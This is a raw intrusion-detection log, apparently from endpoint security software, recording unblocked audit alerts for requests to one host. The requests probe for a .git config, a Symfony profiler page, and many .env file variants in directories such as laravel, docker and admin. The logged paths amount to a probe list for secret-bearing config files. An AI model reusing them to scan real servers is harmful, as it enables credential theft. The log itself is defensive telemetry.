000003a0	01dc9490a8e72626	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94908256a9fb	01dc94908256a9fb	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjgyNTM3M0M5LTk0OTAtMTFGMS04QTA3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000d172	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://ftp.fambamvn.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b7	01dc9490ac3f1668	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490879d5fbb	01dc9490879d5fbb	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijg3OUEyOURFLTk0OTAtMTFGMS04QzNFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000d19c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bb	01dc9490af92496e	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc949088b91887	01dc949088b91887	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijg4QjVDQTZDLTk0OTAtMTFGMS04Q0I1LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000c068	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/dev/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c1	01dc9490af92496e	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490892462b1	01dc9490892462b1	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijg5MjFFQzg5LTk0OTAtMTFGMS04Q0UyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000c070	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/new/.env.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c8	01dc9490af92496e	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc949089a2c0ed	01dc949089a2c0ed	00000001	00000128	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijg5QTAwRENFLTk0OTAtMTFGMS04RjE3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjksIm5hbWUiOiJBdWRpdDogUG9zc2libGUgTWlzY29uZmlndXJlZCBTeW1mb255IEFwcGxpY2F0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000081f5	00010000	00000002	00000002	0000c070	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://ftp.fambamvn.com/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9490af92496e	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94908a5331a4	01dc94908a5331a4	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhBNTMxRDg5LTk0OTAtMTFGMS04RjYyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000c070	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/awstats/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bc	01dc9490af92496e	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94908b08623f	01dc94908b08623f	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhCMDdDMTYzLTk0OTAtMTFGMS04RkFFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000c070	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/conf/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003be	01dc9490b2e57565	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94908db24c46	01dc94908db24c46	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhEQUVGRDg1LTk0OTAtMTFGMS04RUNCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000c078	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/docker/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc9490b98ae03d	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94908f77562a	01dc9490946e1fc5	00000002	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijk0NkFGOTk3LTk0OTAtMTFGMS04MzlFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000e776	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/docker/app/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9490eeae9165	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490c9c43373	01dc9490c9c43373	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM5QzM2RjUzLTk0OTAtMTFGMS1BOUZELTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009a50	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/.vscode/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003ba	01dc9490eeae9165	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490c9e7f688	01dc9490c9e7f688	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM5RTREMTRBLTk0OTAtMTFGMS1BODBCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009a50	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/js/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9490eeae9165	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490caeafd88	01dc9490caeafd88	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNBRTdDNUFGLTk0OTAtMTFGMS1BODc4LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009a58	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/laravel/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c4	01dc9490f1fedf7a	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490cb0aed1c	01dc9490cb0aed1c	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNCMDkyQkE4LTk0OTAtMTFGMS1BODg2LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009a58	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/laravel/core/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bc	01dc9490f1fedf7a	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490cd3ea4bf	01dc9490cd3ea4bf	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNEM0RFMDlCLTk0OTAtMTFGMS1BQjczLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009a66	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/mail/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003be	01dc9490f1fedf7a	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490cdffc1df	01dc9490cdffc1df	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNERkM4RTYzLTk0OTAtMTFGMS1BQkMzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009a74	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/mailer/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bd	01dc9490f1fedf7a	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490ce1ec0ab	01dc9490ce1ec0ab	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNFMUI4QThBLTk0OTAtMTFGMS1BQkQwLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009a74	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/nginx/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bd	01dc9490f5520924	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d0942fda	01dc9490d0942fda	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQwOTFBOUMxLTk0OTAtMTFGMS1BQUQ4LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099c0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/admin/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bc	01dc9490f5520924	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d0b590e4	01dc9490d0b590e4	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQwQjU2Q0JDLTk0OTAtMTFGMS1BQUU3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099c0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/prod/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bb	01dc9490f5520924	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d11751f9	01dc9490d11751f9	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQxMTQ2RjYxLTk0OTAtMTFGMS1BRDBGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099ca	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/.env.bak			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9490f8a53afd	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d1a3fd0c	01dc9490d1a3fd0c	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQxQTE3OTBBLTk0OTAtMTFGMS1BRDRBLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099ca	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/website/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c3	01dc9490f8a53afd	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d1c55e19	01dc9490d1c55e19	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQxQzUzOUVFLTk0OTAtMTFGMS1BRDU5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099ca	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/development/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c8	01dc9490f8a53afd	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d2fdb392	01dc9490d2fdb392	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQyRkE4Q0YwLTk0OTAtMTFGMS1BRERCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099d2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/.env.production.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bd	01dc9490f8a53afd	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d31f18b7	01dc9490d31f18b7	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQzMUU1NDhBLTk0OTAtMTFGMS1BREVBLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099d2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/.env.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9490f8a53afd	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d342dc11	01dc9490d342dc11	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQzNDIxN0UzLTk0OTAtMTFGMS1BREY5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099d2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/.env.example			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bd	01dc9490f8a53afd	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9490d3643bc2	01dc9490d3643bc2	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQzNjExNTVCLTk0OTAtMTFGMS1BQzA2LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000099d2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.fambamvn.com/.env.stage			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
